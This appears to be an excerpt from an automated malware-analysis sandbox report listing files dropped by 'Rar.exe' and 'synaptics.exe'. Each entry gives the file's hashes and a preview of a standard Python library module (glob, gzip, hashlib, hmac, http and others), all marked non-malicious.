                                                                                                                                                                                                                                  Preview:"""..Path operations common to more than one OS..Do not use directly. The OS specific modules import the appropriate..functions from this module themselves..."""..import os..import stat....__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',.. 'getsize', 'isdir', 'isfile', 'samefile', 'sameopenfile',.. 'samestat']......# Does a path exist?..# This is false for dangling symbolic links on systems that support them...def exists(path):.. """Test whether a path exists. Returns False for broken symbolic links""".. try:.. os.stat(path).. except (OSError, ValueError):.. return False.. return True......# This follows symbolic links, so both islink() and isdir() can be true..# for the same path on systems that support symlinks..def isfile(path):.. """Test whether a path is a regular file""".. try:.. st = os.stat(path).. except (OSError, ValueError):.. return False.. return stat.S_ISREG(st.st_mode)......
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7704
                                                                                                                                                                                                                                  Entropy (8bit):4.59015983026496
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:oSGuBRjBdvQQ0ZWBX0RfUFCo/g/FF+44VJ3X0WNoO:oj0dH0ZWB+LBwJnkO
                                                                                                                                                                                                                                  MD5:08EF4DCA79267E51C1CB8B9DB09C0CC8
                                                                                                                                                                                                                                  SHA1:549CE2C250CF5D33DC427D29D3D387672B6BD3D2
                                                                                                                                                                                                                                  SHA-256:42DDAA74BF0B85F684D1C4F40B1C460AEF05B8DBF6FD05FCA68D71D2A07F8AAF
                                                                                                                                                                                                                                  SHA-512:4475B17CA19D985F2C5C017C99A17330BC8AD9FD07B560F472884FF7897284960BAA3A37DF5EE643C6B886715E87293B660D73B221A09D08BC32C1B9421439A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Parser for command line options.....This module helps scripts to parse the command line arguments in..sys.argv. It supports the same conventions as the Unix getopt()..function (including the special meanings of arguments of the form `-'..and `--'). Long options similar to those supported by GNU software..may be used as well via an optional third argument. This module..provides two functions and an exception:....getopt() -- Parse command line options..gnu_getopt() -- Like getopt(), but allow option and non-option arguments..to be intermixed...GetoptError -- exception (class) raised with 'opt' attribute, which is the..option involved with the exception..."""....# Long option support added by Lars Wirzenius <liw@iki.fi>...#..# Gerrit Holl <gerrit@nl.linux.org> moved the string-based exceptions..# to class-based exceptions...#..# Peter .strand <astrand@lysator.liu.se> added gnu_getopt()...#..# TODO for gnu_getopt():..#..# - GNU getopt_long_only mechanism..# - allow the caller to spe
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6175
                                                                                                                                                                                                                                  Entropy (8bit):4.440480314278831
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:PX8OzPyKo5dCMPUwl5o0FvZGNYAp83byrYl4Npx2AfeX2RMqdzNydJdCymzGFQ6Z:0OOVvTAlNppYsYmpxvxRMqtM39Q6qQJ
                                                                                                                                                                                                                                  MD5:0F8B3481C15E6805AFAD8EAE8E770FA1
                                                                                                                                                                                                                                  SHA1:25DDD71B1BD1F38E61A70C1B53E40F0752D328DF
                                                                                                                                                                                                                                  SHA-256:D2B77376A296CBDD0F659DA6CAB047426A4719D3F09949ABA8F334BD01E80593
                                                                                                                                                                                                                                  SHA-512:0E7EE49047339D8DF9D1F233C6EB47004B76D41EE324DACBBDDDA4C55D7C85CFBBFCDE3F9762B9B51AEC6007DEA4796852846A35B8094E61B8F9D472C838B348
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities to get a password and/or the current user name.....getpass(prompt[, stream]) - Prompt for a password, with echo turned off...getuser() - Get the user name from the environment or password database.....GetPassWarning - This UserWarning is issued when getpass() cannot prevent.. echoing of the password contents while reading.....On Windows, the msvcrt module will be used....."""....# Authors: Piers Lauder (original)..# Guido van Rossum (Windows support and cleanup)..# Gregory P. Smith (tty support & GetPassWarning)....import contextlib..import io..import os..import sys..import warnings....__all__ = ["getpass","getuser","GetPassWarning"]......class GetPassWarning(UserWarning): pass......def unix_getpass(prompt='Password: ', stream=None):.. """Prompt for a password, with echo turned off..... Args:.. prompt: Written on stream to ask for the input. Default: 'Password: '.. stream: A writable file object to display the prompt. Def
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28054
                                                                                                                                                                                                                                  Entropy (8bit):4.498377159987173
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8KE7Hoh/b92mxgRPkwKAUJLyFXtC6Q5j7KdrF3Ep77KmlnkqHJbKAit:8v2bjxgNkwKZZyG6aHKdrdmlnkht
                                                                                                                                                                                                                                  MD5:FAF4F6D15309F3F0FF72B5250F4A572D
                                                                                                                                                                                                                                  SHA1:132319D16F45EC0A6A39F5ED1253728F5AEFE9A1
                                                                                                                                                                                                                                  SHA-256:0CFE0A76C6EE6A60BE2C0DD259B115AEFF96E2CAFEE3C5DDF108991EDD8CC527
                                                                                                                                                                                                                                  SHA-512:1C22108C0B3C39B6B8670678E8DDDDFCEBCC6E2C3114784FEFA24D2111B5870CE538220120EC7C6C586A2AF4619B5D34B3142F2D3150D7B6B3CF653358278850
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Internationalization and louserzation support.....This module provides internationalization (I18N) and louserzation (L10N)..support for your Python programs by providing an interface to the GNU gettext..message catalog library.....I18N refers to the operation by which a program is made aware of multiple..languages. L10N refers to the adaptation of your program, once..internationalized, to the local language and cultural habits....."""....# This module represents the integration of work, contributions, feedback, and..# suggestions from the following people:..#..# Martin von Loewis, who wrote the initial implementation of the underlying..# C-based libintlmodule (later renamed _gettext), along with a skeletal..# gettext.py implementation...#..# Peter Funk, who wrote fintl.py, a fairly complete wrapper around intlmodule,..# which also included a pure-Python implementation to read .mo files if..# intlmodule wasn't available...#..# James Henstridge, who also wrote a gettext.py module, wh
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8125
                                                                                                                                                                                                                                  Entropy (8bit):4.483744893777771
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:pFc4Arou6Aroegm/Mn76MRcjRDaaySlZLVixLOTu7tTy:pyPMAMxm/Mnnc9DaaXB4xnhu
                                                                                                                                                                                                                                  MD5:9DABC8ECFFFB6F16FD59D418F35E21C3
                                                                                                                                                                                                                                  SHA1:2FD0A0E2D52FBA4CE022A92033CCE7FFADE39BA5
                                                                                                                                                                                                                                  SHA-256:BE68BE3D9A2052A254879D80A56CE69B6E6A9C1C82BBC7B3608CA8BA4749EF75
                                                                                                                                                                                                                                  SHA-512:3CC5A9DA1D426FC128E76A5278D58B6DB40E81C4F4D64FED96A613DE7D3340425CA70E103EB84C4BCC766CD7C0F5ECA8691031E2300949C3642C2127C69C893C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Filename globbing utility."""....import contextlib..import os..import re..import fnmatch..import itertools..import stat..import sys....__all__ = ["glob", "iglob", "escape"]....def glob(pathname, *, root_dir=None, dir_fd=None, recursive=False):.. """Return a list of paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. However, unlike fnmatch, filenames starting with a.. dot are special cases that are not matched by '*' and '?'.. patterns..... If recursive is true, the pattern '**' will match any files and.. zero or more directories and subdirectories... """.. return list(iglob(pathname, root_dir=root_dir, dir_fd=dir_fd, recursive=recursive))....def iglob(pathname, *, root_dir=None, dir_fd=None, recursive=False):.. """Return an iterator which yields the paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. However, unlike fnmatch, filenames s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9819
                                                                                                                                                                                                                                  Entropy (8bit):4.255538830099529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rNcRMEUR8YGCyTXFCRIBxgI1umbJrjMpxEIPktyaZN58Uff7yWPJyeTs7SD3Kqn2:piMEUmCyQMxgI0XEBX58UFXl+H
                                                                                                                                                                                                                                  MD5:EE15C72D9CE4C8AC3566570A1B5ADB79
                                                                                                                                                                                                                                  SHA1:14A72977DA46F96BAA3AA348AC77DE6F3CFC065C
                                                                                                                                                                                                                                  SHA-256:2C618FBEF31D772844057C4CFA74BD90874CE0FD9FAB886E3597E4FCA8AEA7E7
                                                                                                                                                                                                                                  SHA-512:19598987512034E50175FBAFB9F948595EA7FBD9CB4A7004DB55D56A770D964033E2441DE6F6B62D2CBD7B730A8CAB68A3CBFACE05447354B9AD66F4D1544F4E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:__all__ = ["TopologicalSorter", "CycleError"]...._NODE_OUT = -1.._NODE_DONE = -2......class _NodeInfo:.. __slots__ = "node", "npredecessors", "successors".... def __init__(self, node):.. # The node this class is augmenting... self.node = node.... # Number of predecessors, generally >= 0. When this value falls to 0,.. # and is returned by get_ready(), this is set to _NODE_OUT and when the.. # node is marked done by a call to done(), set to _NODE_DONE... self.npredecessors = 0.... # List of successor nodes. The list can contain duplicated elements as.. # long as they're all reflected in the successor's npredecessors attribute... self.successors = []......class CycleError(ValueError):.. """Subclass of ValueError raised by TopologicalSorter.prepare if cycles.. exist in the working graph..... If multiple cycles exist, only one undefined choice among them will be reported.. and included in the exception. The det
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22458
                                                                                                                                                                                                                                  Entropy (8bit):4.493285652895645
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:4rrWHTcJt2MIIfqSErRS7IO9a/86ZBbV7QywQXBnT:KJtpAU7huR7Q8T
                                                                                                                                                                                                                                  MD5:97D3C070D8BAC4A2C8F92F64864C6814
                                                                                                                                                                                                                                  SHA1:D621A5BB1939468B25D45216A794681BF1765431
                                                                                                                                                                                                                                  SHA-256:AE72AA290F3AA83BDAA337D92C19B39E396F7BE984FB0F9B60F57464AAA18020
                                                                                                                                                                                                                                  SHA-512:D56D16D5E1BBE29CC7CAECC2D74A1E44D21710A6E523AAF6E3B3B0E259502272A8C0F470A12526B5DFE575597D40285E480FEC6047EF16517A29E91868B50AB2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Functions that read and write gzipped files.....The user of the file doesn't have to worry about the compression,..but random access is not allowed."""....# based on Andrew Kuchling's minigzip.py distributed with the zlib module....import struct, sys, time, os..import zlib..import builtins..import io..import _compression....__all__ = ["BadGzipFile", "GzipFile", "open", "compress", "decompress"]....FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16....READ, WRITE = 1, 2...._COMPRESS_LEVEL_FAST = 1.._COMPRESS_LEVEL_TRADEOFF = 6.._COMPRESS_LEVEL_BEST = 9......def open(filename, mode="rb", compresslevel=_COMPRESS_LEVEL_BEST,.. encoding=None, errors=None, newline=None):.. """Open a gzip-compressed file in binary or text mode..... The filename argument can be an actual filename (a str or bytes object), or.. an existing file object to read from or write to..... The mode argument can be "r", "rb", "w", "wb", "x", "xb", "a" or "ab" for.. binary mode, or "rt", "wt",
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10498
                                                                                                                                                                                                                                  Entropy (8bit):4.823698140650247
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:KSBDUhawz9fJ+8lOVaX2B916+jZVJ0tMmLfGfpR9eGe9IpeuR95x4TgDM4KAiu9k:KSBmfj2LEMmqpR+9u5d4H4JH9xx4v
                                                                                                                                                                                                                                  MD5:21DD74815051864F290794402768F3B9
                                                                                                                                                                                                                                  SHA1:A5D1E78B5C9172FE184D6B32B67848164EDEBB34
                                                                                                                                                                                                                                  SHA-256:4F2CD247217F809905C3D7A3178EAE31D697C33CA42F06E9D2217DF86D4832A8
                                                                                                                                                                                                                                  SHA-512:194464D2309DADBBB2CCB8217765F727BE9E86914EB67ECEA89332BAA8629A9E0C40A7707DDEB7DB768A2FC85DED20EF8D74FE03CDD78998B29EF374E9D74953
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#. Copyright (C) 2005-2010 Gregory P. Smith (greg@krypto.org)..# Licensed to PSF under a Contributor Agreement...#....__doc__ = """hashlib module - A common interface to many hash functions.....new(name, data=b'', **kwargs) - returns a new hash object implementing the.. given hash function; initializing the hash.. using the given binary data.....Named constructor functions are also available, these are faster..than using new(name):....md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),..sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256.....More algorithms may be available on your platform but the above are guaranteed..to exist. See the algorithms_guaranteed and algorithms_available attributes..to find out what algorithm names can be passed to new().....NOTE: If you want the adler32 or crc32 hash functions they are available in..the zlib module.....Choose your hash function wisely.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23478
                                                                                                                                                                                                                                  Entropy (8bit):4.580828814586343
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:zIyh8ImoQ2TaWDxr0K6rNK3WahBUmYcqV3+oxjTe+ENxd1S2+HGRh:zIC8ImTiA5cgxjT4xdGH+
                                                                                                                                                                                                                                  MD5:6D447DCB24E4E6EEB99B898F90736687
                                                                                                                                                                                                                                  SHA1:2CF71707A9889363EAFE7616BD3C585A6897E882
                                                                                                                                                                                                                                  SHA-256:F140027EAFEF0C3D3FC13D9B393F1A6F24069E5437BDE478E1B95EB47D3EA24D
                                                                                                                                                                                                                                  SHA-512:EF2D1884A5B56EA3533760C382CAE2D345CCD5F0FE54D6063EAAB4E6A3E01581F312C076FA73A75BA5451E618653BCB1F937BC3D77E9956AB8C61AA3FE008CB7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Heap queue algorithm (a.k.a. priority queue).....Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for..all k, counting elements from 0. For the sake of comparison,..non-existing elements are considered to be infinite. The interesting..property of a heap is that a[0] is always its smallest element.....Usage:....heap = [] # creates an empty heap..heappush(heap, item) # pushes a new item on the heap..item = heappop(heap) # pops the smallest item from the heap..item = heap[0] # smallest item on the heap without popping it..heapify(x) # transforms list into a heap, in-place, in linear time..item = heapreplace(heap, item) # pops and returns smallest item, and adds.. # new item; the heap size is unchanged....Our API differs from textbook heap algorithms as follows:....- We use 0-based indexing. This makes the relationship between the.. index for a node and the indexes for its children slightly less.. obvious, but
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7936
                                                                                                                                                                                                                                  Entropy (8bit):4.550266087115813
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6ko2Qnkb5tQl/eFrNry3HYO429+036i5BhzRG8j:6ko2QM5tQlmFrNr/O4L03HhzRD
                                                                                                                                                                                                                                  MD5:A7308CEE7CED61CEA957D925076FB85B
                                                                                                                                                                                                                                  SHA1:D23A21F8ADF650171695BCFFF239E974A783DF66
                                                                                                                                                                                                                                  SHA-256:C9FC1D1AC2E1AF1FCB0976E9A7FFBE14B13A4177C0F39AF9639EA341338DC72C
                                                                                                                                                                                                                                  SHA-512:7609E95ACB5BC5CBC570060D5E167E1E3A9A5035E3822580F4BAE7D17AC5C497DEE5F6DD0E80F46EBDDEA4985721FA4FCA055F379F5DC731DD70FFE0F36BFF7A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""HMAC (Keyed-Hashing for Message Authentication) module.....Implements the HMAC algorithm as described by RFC 2104..."""....import warnings as _warnings..try:.. import _hashlib as _hashopenssl..except ImportError:.. _hashopenssl = None.. _functype = None.. from _operator import _compare_digest as compare_digest..else:.. compare_digest = _hashopenssl.compare_digest.. _functype = type(_hashopenssl.openssl_sha256) # builtin type....import hashlib as _hashlib....trans_5C = bytes((x ^ 0x5C) for x in range(256))..trans_36 = bytes((x ^ 0x36) for x in range(256))....# The size of the digests returned by HMAC depends on the underlying..# hashing module used. Use digest_size from the instance of HMAC instead...digest_size = None......class HMAC:.. """RFC 2104 HMAC class. Also complies with RFC 4231..... This supports the API for Cryptographic Hash Functions (PEP 247)... """.. blocksize = 64 # 512-bit HMAC; can be changed in subclasses..... __slots__ = (..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6883
                                                                                                                                                                                                                                  Entropy (8bit):5.095382966902921
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:FcbQSiy+TbKatPR4qXiasXh+O5ZSsB3CeAXI5UKj:F/yqXiasXzgep5UKj
                                                                                                                                                                                                                                  MD5:26B5CF5F93FA25440187796DB6CCCE16
                                                                                                                                                                                                                                  SHA1:7547272BDFA0BC9A9387CDE17FC5972B548E2593
                                                                                                                                                                                                                                  SHA-256:6297DA88AB77CCED08A3C622C51292851CC95B8175B7342B4CD7F86595F73158
                                                                                                                                                                                                                                  SHA-512:BD5737BFCE668B6F1513A00010C8A33E6D2841C709B4DFE86DA1A7EE51C78C27AB61DABA6E1F2599432EA4224D6E488F61F464AF385F5180A7F55EC9142D4F1A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from enum import IntEnum....__all__ = ['HTTPStatus']......class HTTPStatus(IntEnum):.. """HTTP status codes and reason phrases.... Status codes from the following RFCs are all observed:.... * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616.. * RFC 6585: Additional HTTP Status Codes.. * RFC 3229: Delta encoding in HTTP.. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518.. * RFC 5842: Binding Extensions to WebDAV.. * RFC 7238: Permanent Redirect.. * RFC 2295: Transparent Content Negotiation in HTTP.. * RFC 2774: An HTTP Extension Framework.. * RFC 7725: An HTTP Status Code to Report Legal Obstacles.. * RFC 7540: Hypertext Transfer Protocol Version 2 (HTTP/2).. * RFC 2324: Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0).. * RFC 8297: An HTTP Status Code for Indicating Hints.. * RFC 8470: Using Early Data in HTTP.. """.. def __new__(cls, value, phrase, descriptio
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6427
                                                                                                                                                                                                                                  Entropy (8bit):5.803846609080695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:PWZsdAk4kaBaNzpZOZBDcxHN/8O2OHb4k7:PjzpZOZBDcpNp2iT
                                                                                                                                                                                                                                  MD5:CE68FA3895F543A71FAC75A6B4ADB306
                                                                                                                                                                                                                                  SHA1:D81576955C3DFE438D5E83AB9AB9ECE3F9C871D2
                                                                                                                                                                                                                                  SHA-256:DECDD1B71A605D715EAF7CD3FF60405573000CE8273040FF202BECAECE3EC614
                                                                                                                                                                                                                                  SHA-512:88268CBEE5A30BDB470E8C2D77A197DA8A042EFEFD7969306A98A47F91BEE449AFC476FF9C77FEC105651132FA7D5EAFF97A24603C6C733F4D3542709F7A1670
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35189
                                                                                                                                                                                                                                  Entropy (8bit):5.380431913127976
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:poG3Ky3gu5p4T9uaP5OvX/6aHpq//oUyt2iGYS9uj8Eqds:iG3Rgu5p4T9u25OvX/6aHpg/gt2iGYSo
                                                                                                                                                                                                                                  MD5:34C4704DA8060812A94914794982C402
                                                                                                                                                                                                                                  SHA1:C0E6DAD28CBC7E94AE0B8B2BF54820E10416B877
                                                                                                                                                                                                                                  SHA-256:B4C01D59510D206D4AA5CE999A53EB255D4EAD1A3F4714A5C69E531B6065F647
                                                                                                                                                                                                                                  SHA-512:32BEB2A529F5B3A851B834866388AA79ED446855772E5BFE6A0B0ACD0B3436746A702DCA659D449B9A63FF16DD3CEFB2A5359C7F120FB5171D62FA4C6F730CF2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):53451
                                                                                                                                                                                                                                  Entropy (8bit):5.561451599007097
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:6Bq5TRGXx0wM1oyXc63+dpUTXcc5he57HfAqZ8K20oERqRGwFkEu58kvknKdVWV6:1AI1FXZ+bUQ8hlER6dg6hMT
                                                                                                                                                                                                                                  MD5:7192065680E0EB8ABECB255E3CD72E7D
                                                                                                                                                                                                                                  SHA1:3982C598A36FE78F97A70153E8500408B5C0FB64
                                                                                                                                                                                                                                  SHA-256:2E85A6389DC1BC60C9FC536B8FC1296A86C8DC071561DD1C36B4D623ADD412FF
                                                                                                                                                                                                                                  SHA-512:D70CDACD5D7A8048D67E2A0238053F356FB3990280C9632216225DF295D878633C639B18108193319A88A89D35637C4A849180B6E03CDEDDD908F346567A090C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):53451
                                                                                                                                                                                                                                  Entropy (8bit):5.561451599007097
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:6Bq5TRGXx0wM1oyXc63+dpUTXcc5he57HfAqZ8K20oERqRGwFkEu58kvknKdVWV6:1AI1FXZ+bUQ8hlER6dg6hMT
                                                                                                                                                                                                                                  MD5:7192065680E0EB8ABECB255E3CD72E7D
                                                                                                                                                                                                                                  SHA1:3982C598A36FE78F97A70153E8500408B5C0FB64
                                                                                                                                                                                                                                  SHA-256:2E85A6389DC1BC60C9FC536B8FC1296A86C8DC071561DD1C36B4D623ADD412FF
                                                                                                                                                                                                                                  SHA-512:D70CDACD5D7A8048D67E2A0238053F356FB3990280C9632216225DF295D878633C639B18108193319A88A89D35637C4A849180B6E03CDEDDD908F346567A090C
                                                                                                                                                                                                                                  Malicious:false
